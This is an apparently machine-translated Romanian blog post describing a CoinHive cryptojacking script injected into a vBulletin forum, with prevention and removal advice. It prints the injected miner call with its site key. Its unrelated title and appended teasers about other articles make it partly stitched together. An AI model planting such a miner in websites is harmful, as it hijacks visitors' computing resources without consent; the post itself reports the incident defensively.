Criptarea informatiei folosind codul Cezar
Cuprins:
Am citit despre proprietarii de site-uri folosind scripturi pe site-urile lor care utilizează CPU-ul computerului vizitatorului atunci când accesează site-ul lor. Ideea este de a genera bani din conținutul lor - și astfel, în loc să folosească anunțuri, aceștia utilizează un script care rulează în browser și utilizează resursele de computer ale utilizatorului pentru a-mi plăti criptocurrency. Dar m-am gândit că numai proprietarii de site-uri au făcut acest lucru prin design - nu mi-am imaginat niciodată că hackerii ar hacki site-uri web și împing scenariul pe alte site-uri web și să-și folosească CPU-ul vizitatorilor pentru a câștiga bani pentru ei înșiși.
Iar când am vizitat Forumul TWC, care rulează pe software-ul vBulletin, software-ul meu de securitate a aruncat acest avertisment:
// coinhive dot com /lib/coinhive.js Fișier obiect detectat, descărcat blocat
De obicei, vizitez forumul în fiecare zi și nu l-am văzut cu o zi înainte. Deci, presupun că acest lucru sa întâmplat ceva timp în timpul nopții, timpul meu, când dormeam.
Folosesc software-ul vBulletin pentru forum și a fost actualizat la cea mai recentă versiune. Mai mult, acest lucru a fost destul de surprinzător pentru noi, deoarece domeniul TheWindowsClub.com folosește
Sucuri Web Antivirus & Firewall pentru a se proteja de amenințările și atacurile web online. pe calculatorul meu Windows 10. Am verificat cu alte browsere precum Chrome & Edge și rezultatele au fost aceleași.
După ce faceți clic dreapta pe pagina de web a forumului și verificați codul sursă, am constatat că a fost un script malware CryptoMiner al lui CoinHive
Acesta este codul rău intenționat Javascript care a intrat în codul forumului meu:
var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
Oricum, primul lucru pe care l-am făcut a fost să iau Sucuri
Oamenii de la Sucuri au curățat forumul scenariului Coinhive, care a fost împins în forumul meu în câteva ore și totul a fost în regulă
Ce este CoinHive Coinhive oferă un miner de tip JavaScript pentru criptocurrencyul Monero pe care îl poți încorpora în site-ul tău și poți folosi CPU-ul calculatoarelor de pe site-ul web pentru a-ți arăta monedele.
Aceasta se numește
Cryptojacking
. Aceasta implică deturnarea browserelor utilizatorilor pentru exploatarea prin criptare. Unii proprietari de site-uri pot folosi ei înșiși pentru a face bani - dar în cazul nostru, au fost injectați. Atunci când un utilizator accesează site-ul infectat, JavaScript Coinhive execută și exploatează minele Monero folosind resursele CPU ale utilizatorului. Acest lucru poate duce la blocarea CPU și la un accident de sistem neașteptat al mașinii victimei. Acum, dacă browserul dvs. este infectat, veți vedea că utilizarea resurselor crește. Închideți browserul și acesta va scădea. Utilizatorul poate observa încălzirea mașinii, ventilatorul care rulează rapid sau bateria care se scurge rapid.
L-am întrebat pe colegul meu Saurabh Mukhekar să viziteze forumul meu folosind
Mac
și să văd ce sa întâmplat. Ei bine, și calculatorul lui Mac a fost afectat atunci când a deschis forumul cu Safari! El este unul dintre acei utilizatori inteligenți de Mac OSX care utilizează un software antivirus pentru Mac. Antivirusul lui Avast pentru Mac a oprit cu succes scriptul malware. Said Saurabh, Malware-ul CoinHive nu numai că hijackează un PC Windows, dar și Mac, de asemenea, deoarece este bazat pe browser-ul JavaScript. Este bine nu cred în mitul că Mac-urile nu au nevoie de un software antivirus, altfel mașina mea ar fi fost infectată, iar Mac-ul meu ar fi continuat să-și scoată monedele pentru altcineva.
Prevenirea infectării site-ului cu
Nu utilizați niciun șablon sau plugins NULL pe site-ul / forumul dvs.
Mențineți CMS actualizat la cea mai recentă versiune
- Actualizați-vă periodic software-ul de găzduire (PHP,Asigurați-vă site-ul dvs. cu furnizori de securitate web, cum ar fi Sucuri, Cloudflare, Wordfence, etc.
- Luați măsuri de precauție de bază pentru a vă asigura blogul dvs.
- Îndepărtarea mineralelor din site-ul
- În primul rând trebuie să fiți webmasterul sau dacă aveți acreditări administrative care vă permit accesul la toate fișierele site-ului web.
- Acum când antivirusul dvs. detectează infecția CoinHive, faceți clic dreapta pe pagina Web și selectați
Vizualizați codul sursă
. Apoi apăsați
Ctrl + F și căutați "CoinHive". Odată ce ați identificat locația codului rău intenționat, trebuie să vedeți poziția sa - unde este localizată. Acum trebuie să o eliminați manual. Pentru a face acest lucru, aveți nevoie de un pic de cunoaștere a codificării platformei dvs. Va trebui să localizați fișierele infectate și să eliminați manual scriptul de mai sus. Dacă nu sunteți sigur (ă), vă rugăm să cereți unui expert să o facă. Din moment ce folosim Sucuri, le-am lăsat să facă acest lucru. După ce ați făcut acest lucru, goliți memoria cache a serverului și browserului. Dacă utilizați orice plugin de cache sau spuneți MaxCDN, ștergeți și acele cache-uri. Protejați-vă împotriva scripturilor miniere crypto
Tehnologia Cryptocurrencies & Blockchain prelua lumea. Ea creează un impact asupra economiei globale și provoacă perturbări tehnologice. Toți au început să se concentreze pe o astfel de piață profitabilă - și asta include și hackerii de pe site. Pe măsură ce profitul crește, ar trebui să ne așteptăm ca aceste tehnologii să fie utilizate în mod abuziv. Aceasta este partea întunecată a oricărei tehnologii emergente.
Ce putem face este să luăm cele mai bune precauții posibile în orice moment. În afară de utilizarea unui bun software de securitate, utilizați o extensie Chrome sau Firefox care blochează site-urile web de la utilizarea CPU-ului dvs. la Cryptocurrency - sau mai bine, folosiți Anti-WebMiner care va opri atacurile Cryptojacking Mining Script modificând fișierul Hosts. Funcționează pe toate browserele. Dacă sunteți utilizator de Mac, vă rugăm să obțineți și un software antivirus pentru calculatorul dvs.
Din păcate, dacă ați simțit vreodată că ați vizitat un site infectat, ar fi o idee bună să ștergeți browserul cache și scanați aparatul cu software-ul antivirus, precum și cu AdwCleaner
Stați în siguranță, stați la curent!
Examinatorul de link-uri vă ajută să eliminați legăturile de pe site-ul dvs.
Când legăturile site-ului dvs. Web nu funcționează, vă pregătiți (și adorați publicul) pentru frustrare. Introduceți gratuit AnalogX LinkExaminer. Efectuează o treabă excelentă de verificare a fiecărui link dintr-un întreg site Web sau de la o pagină individuală și de alertare către legături moarte și mai mult.
ÎNcărcați direct în Windows 8 Desktop utilizând scriptul Explorer
Dezactivați Windows 8 Start Screen. Puteți să evitați ecranul Metro la pornire, forțând aplicația Windows 8 desktop mode să se încarce de îndată ce vă conectați, creând un fișier Explorer Script care lansează desktopul.
Hackerii scurg scriptul jocului de tronuri episodul 5 și o notă de răscumpărare
Game of Thrones se confruntă din nou cu mânia hackerilor, deoarece scenariul pentru cel de-al cincilea episod din sezonul în curs a fost scurs și a fost solicitată răscumpărarea.